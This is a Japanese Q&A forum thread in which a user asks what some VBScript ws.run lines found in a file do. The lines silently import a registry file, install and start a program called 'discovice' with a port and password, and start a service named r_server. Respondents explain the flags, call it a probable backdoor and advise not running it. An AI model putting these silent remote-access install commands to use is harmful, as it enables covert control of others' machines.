• ベストアンサー

ws.runのコマンドについて

ws.runのコマンドについて教えてください。 以下のコマンドは何を表しているのでしょうか? ws.run "regedit.exe /s r.reg",0 ws.run "discovice /port:3625 /pass:heuhei /save /silence",0

質問者が選んだベストアンサー

• ベストアンサー
  • ken1219
回答No.3

ポップアップを出さない指示は/sです。 コマンドの構文は、 http://support.microsoft.com/kb/310516/JA/ をご覧ください。 r.regファイルの中身が不明なので、 なんともいえませんが。 r.regファイル上で右クリックし、 編集をクリック 開いたメモ帳の中身をコピーし、ここへは貼り付けて いただければ、多少なりともお力になれるかもしれませんが・・・

jones0901
質問者

補足

わかりやすい回答とHPありがとうございました。 追加で質問ですが、あるファイルの中身なのですが、各行の意味を教えて頂けないでしょうか?あつかましいお願いは承知ですが、何卒宜しくお願い致します。 ws.run "discovice /port:3625 /pass:heuhei /save /silence",0 ws.run "discovice /install /silence",0 ws.run "net start r_server",0 ws.run "Explorer /install",0

その他の回答 (3)

• todo36
回答No.4

おそらく、バックドアでしょう。

jones0901
質問者

補足

これを生成しているモジュールを特定する方法はございますでしょうか?

• todo36
回答No.2

正体不明のプログラムを起動するなんてとんでもないです。 私の回答は 入手先に聞くか、分からないのであれば触らずに捨てる。

• ken1219
回答No.1

一行目は、r.regファイルをレジストリに書き込む指示 その際に、ポップアップの確認はださない。 二行目は、discoviceというコマンドを実行 しているようですが、このコマンドがどんなものなのか が不明なため、お答えができません。 ご自身のマシンで、DOSプロンプトを起動し discoviceと打ち込むと、どのようになりますか?

jones0901
質問者

補足

迅速な回答ありがとうございました。 1行目のr.regファイルをレジストリに書き込む指示というのは具体的にどういった処理でしょうか? その際に、ポップアップの確認はださないといいますのは /sの部分でしょうか? 上記のコマンドの詳細が記載されているHP等があれば教えて頂けないでしょうか? 誠にお手数をおかけしますがご教示頂ければ幸いです。